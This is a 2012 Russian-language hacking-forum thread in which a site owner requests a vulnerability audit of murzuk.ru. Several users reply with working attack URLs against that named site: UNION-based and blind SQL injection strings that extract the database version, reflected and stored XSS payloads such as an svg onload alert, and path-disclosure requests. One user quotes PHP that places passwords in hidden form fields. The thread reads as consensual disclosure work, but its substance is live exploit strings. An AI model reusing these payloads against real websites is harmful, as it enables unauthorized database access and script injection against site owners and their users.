Старый 22.10.2012, 17:54   #1
Ranow
 
Регистрация: 22.10.2012
Сообщений: 4
Репутация: 0
По умолчанию Аудит

Помогите провести аудит сайта на уязвимости и исправить их. Сайт - http://murzuk.ru
P.S. Вопрос вознаграждения давайте обсудим в личке! Заранее огромное спасибо!
Ranow вне форума  
Старый 22.10.2012, 18:07   #2
kingbeef
 
Регистрация: 28.10.2011
Сообщений: 17
Репутация: 0
По умолчанию

http://murzuk.ru/show_good.php?idtov=-35007'+union+select+1,2,3,version(),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20--+f

5.0.92-log

http://murzuk.ru/osnov_cart.php?c=9&new=777384'

Раскрытие путей.


UPD.
Xss

http://murzuk.ru/osnov_cart.php?c=2
Уязвимое поле "Адрес доставки"

<svg/onload=alert(/xss/)>

Последний раз редактировалось kingbeef; 22.10.2012 в 20:02..
kingbeef вне форума  
Старый 22.10.2012, 18:34   #3
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 252
Репутация: 155
По умолчанию

https://rdot.org/forum/showthread.php?t=26

Не будет баннера акк пойдёт в бан
__________________
------------------
Jokester вне форума  
Старый 22.10.2012, 18:50   #4
Ranow
 
Регистрация: 22.10.2012
Сообщений: 4
Репутация: 0
По умолчанию

готово
Ranow вне форума  
Старый 22.10.2012, 18:54   #5
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 252
Репутация: 155
По умолчанию

спасибо
__________________
------------------
Jokester вне форума  
Старый 22.10.2012, 19:57   #6
BlackFan
 
Аватар для BlackFan
 
Регистрация: 08.07.2010
Сообщений: 354
Репутация: 402
По умолчанию

xss
http://murzuk.ru/show_cat2.php?grid=2141&catid=2171%3E%3Ch1%3Exss
http://murzuk.ru/show_fine.php?dd=23&grid=51%3E%3Ch1%3Exss
http://murzuk.ru/osnov_cart.php?c=9
post
a555039:><h1>xss


fpd
http://murzuk.ru/show_cart2.php?&new=-1
http://murzuk.ru/show_silk.php


sqli
http://murzuk.ru/show_cart2.php?&new=555040'+and+0+union+select+1,2 ,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20--+-
BlackFan вне форума  
Старый 22.10.2012, 20:13   #7
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

http://murzuk.ru/osnov_cart.php?c=2
Код:
<input type=hidden name=username value=\"".$username."\">
<input type=hidden name=passwd value=\"".$passwd."\">
<input type=hidden name=passwd2 value=\"".$passwd2."\">
что это?
M_script вне форума  
Старый 22.10.2012, 22:03   #8
Ranow
 
Регистрация: 22.10.2012
Сообщений: 4
Репутация: 0
По умолчанию

Ищу специалиста по устранению ошибок...пишите в личку, обсудим оплату.
Ranow вне форума  
Старый 22.10.2012, 22:46   #9
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

blind sqli
  • http://murzuk.ru/show_foto.php?idft=30+and(mid(version(),1,1)=5)
  • http://murzuk.ru/show_foto.php?idft=30+and(mid(version(),3,1)=0)
  • http://murzuk.ru/osnov.php?c=46&idgrdesk=1'+and(mid(version(),1,1)= 5)and'1

Последний раз редактировалось Pashkela; 22.10.2012 в 23:21..
Pashkela вне форума  
Старый 23.10.2012, 14:17   #10
Ranow
 
Регистрация: 22.10.2012
Сообщений: 4
Репутация: 0
По умолчанию

Спасибо, тему можно закрывать!
Ranow вне форума  
Закрытая тема

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot